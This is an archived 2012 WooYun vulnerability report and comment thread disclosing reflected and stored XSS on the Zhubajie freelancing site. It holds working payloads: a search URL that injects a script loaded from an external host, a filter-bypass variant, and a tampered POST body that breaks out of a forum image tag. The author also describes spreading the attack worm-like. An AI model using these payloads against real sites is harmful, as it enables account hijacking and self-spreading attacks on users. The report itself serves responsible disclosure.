当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012168

漏洞标题:送上猪八戒网xss 2枚(可蠕虫)

相关厂商:猪八戒网

漏洞作者: 啤酒

提交时间:2012-09-14 10:51

修复时间:2012-10-29 10:51

公开时间:2012-10-29 10:51

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-14: 细节已通知厂商并且等待厂商处理中
2012-09-14: 厂商已经确认,细节仅向厂商公开
2012-09-24: 细节向核心白帽子及相关领域专家公开
2012-10-04: 细节向普通白帽子公开
2012-10-14: 细节向实习白帽子公开
2012-10-29: 细节向公众公开

简要描述:

猪八戒网一个反射型xss和储存型xss

详细说明:

先说反射型
先感谢@possible 大牛给的点。
猪八戒网貌似用的第三方的输入输出防火墙. 各种符号过滤包括冒号,唯独没有过滤<>
貌似你的第三方只过滤注入。而且是用一大串的n个\\\\转义, html标签可不认这个转义
" 号就可阻断了这防火墙真的很奇葩啊。
于是有了下面的反射型.http://search.zhubajie.com/?qa=</title><script src=//192.168.2.254/all.js> </script><title>
titile 标签 闭合然后写入script标签 测试的时候发现 http://加不进去 是过滤了:号 没事ie会自己补http://
这样干净的绕过输入过滤机制
引入外部js ie6的随便打了.
猪八戒站内的各种互动,把连接用短网址伪装好.
发给人点,点了后再顺便把点的人也感染一番,然后下面的人继续点.
接着又和@possible讨论按照八戒的用的防漏洞的机制估计整站都是用的这个产品不难想象这样的转义过滤多半存在储存型,于是继续挖果然不出所料。


接着说储存型的
http://quan.zhubajie.com/thread-index-threadid-141832-page-21.html
猪圈的编辑器有个插表情的功能
这样的ubb编辑器一看基本上都有储存了
于是顺手测了下真的有
复现流程
登录猪圈http://quan.zhubajie.com/
打开抓包工具,点击俯卧撑表情提交,在抓包工具里面截获post包得到


在%5d前面加入%22 (双引号)发出去
修改包前:

threadid=141832&message=+%5Bimg%3D%E4%BF%AF%E5%8D%A7%E6%92%91%5Dhttp%3A%2F%2Fs.zbjimg.com%2Fubb%2Fxheditor_emot%2Fdefault%2F8.gif%5B%2Fimg%5D&tagid=5216


改包后:

threadid=141832&message=+%5Bimg%3D%E4%BF%AF%E5%8D%A7%E6%92%91%22%5Dhttp%3A%2F%2Fs.zbjimg.com%2Fubb%2Fxheditor_emot%2Fdefault%2F8.gif%5B%2Fimg%5D&tagid=5216


回到页面可见img标签已经被阻断了
那么就加入onload 过程不详述了看图



由此产生储存型.页面排版已经乱了onload已经加进去了
这里我没有使用alert 是不想在这个帖子弹。测的时候这个帖子可热着.

漏洞证明:


http://quan.zhubajie.com/thread-index-threadid-141832-page-21.html
用开发人员工具定位看dom

修复方案:

过滤

版权声明:转载请注明来源 啤酒@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-09-14 15:10

厂商回复:

感谢提醒,我们尽快修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-09-14 15:00 | 啤酒 ( 实习白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

    八戒的修复还是很快的.不过不彻底还有..

  2. 2012-09-14 15:16 | 啤酒 ( 实习白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

    @猪八戒网 那再提醒一下吧:http://search.zhubajie.com/?qa="</title><script src=//192.168.2.254/all.js></script><title> 过滤双引号..亲

  3. 2012-09-14 15:56 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    这个可以还算一个 再发呵呵

  4. 2012-09-14 16:10 | 啤酒 ( 实习白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

    @possible 算了反射型的再发也没啥意思了